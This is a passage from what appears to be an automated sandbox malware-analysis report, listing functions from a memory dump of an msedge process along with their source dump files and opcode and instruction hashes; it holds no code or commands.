                                            • Opcode Fuzzy Hash: aaaaa10bf4db1411733e8db9eaf10f3afebd011010e1b4b4389c1be5a20a251f
                                            • Instruction Fuzzy Hash: 46310621B18E594FE794BBFC88693BEBAD1EFA8701F04417EE00DC3293DD28A9018751
                                            Function 00007FFD34670999 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a18f4716483321e93ad589200d52b25e20ff27994f300520cb2a447e0af25fc
                                            • Instruction ID: 66d58a45310d9b1ceed5aa294a111855a0bb2100fc68468a4da138932df81280
                                            • Opcode Fuzzy Hash: 4a18f4716483321e93ad589200d52b25e20ff27994f300520cb2a447e0af25fc
                                            • Instruction Fuzzy Hash: 22419371F18A1E4FEB45EBA8C8756EABBE1FF98300F544579D109D3286CE38A801C750
                                            Function 00007FFD34670818 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 391669899ef18abfbc0f381f84d3f2808890c3e7b8ad179a6d6a7657c1a5a642
                                            • Instruction ID: 4b229a6ca37745f34e04aa24d4c2864b0e50fd5ec4b05045cf7a4710b0962edd
                                            • Opcode Fuzzy Hash: 391669899ef18abfbc0f381f84d3f2808890c3e7b8ad179a6d6a7657c1a5a642
                                            • Instruction Fuzzy Hash: C031E425B5970E5BD751EBECD0B99EABB61FF98319F804078D14DC3386DE246801CB91
                                            Function 00007FFD34670870 Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b89682f59f1d62604c1024fc842a227781daaace80ea870c895f6893d99c7687
                                            • Instruction ID: fc6ffcb795c56acd8941cca14fd24fc828062f13e795e80e9361887d591bc17a
                                            • Opcode Fuzzy Hash: b89682f59f1d62604c1024fc842a227781daaace80ea870c895f6893d99c7687
                                            • Instruction Fuzzy Hash: B1318024B9974E5FD752EBACD0B8AA9BF71EF98305F8044A9D44EC3386DE246900CB51
                                            Function 00007FFD34671F01 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b98a4402bec13af0469c98423c6d4bf44b65c9f957fefa0d832f17cd0a53a4e4
                                            • Instruction ID: 6052b4fe38eb4e78b323f9099acde4c22a5a1e77af532e305edcfbaa2c08c4ef
                                            • Opcode Fuzzy Hash: b98a4402bec13af0469c98423c6d4bf44b65c9f957fefa0d832f17cd0a53a4e4
                                            • Instruction Fuzzy Hash: AD014751E0CBD00EE751AB385CB10A57FE09BD3220B0845ABD888C62E3DA0CAA459342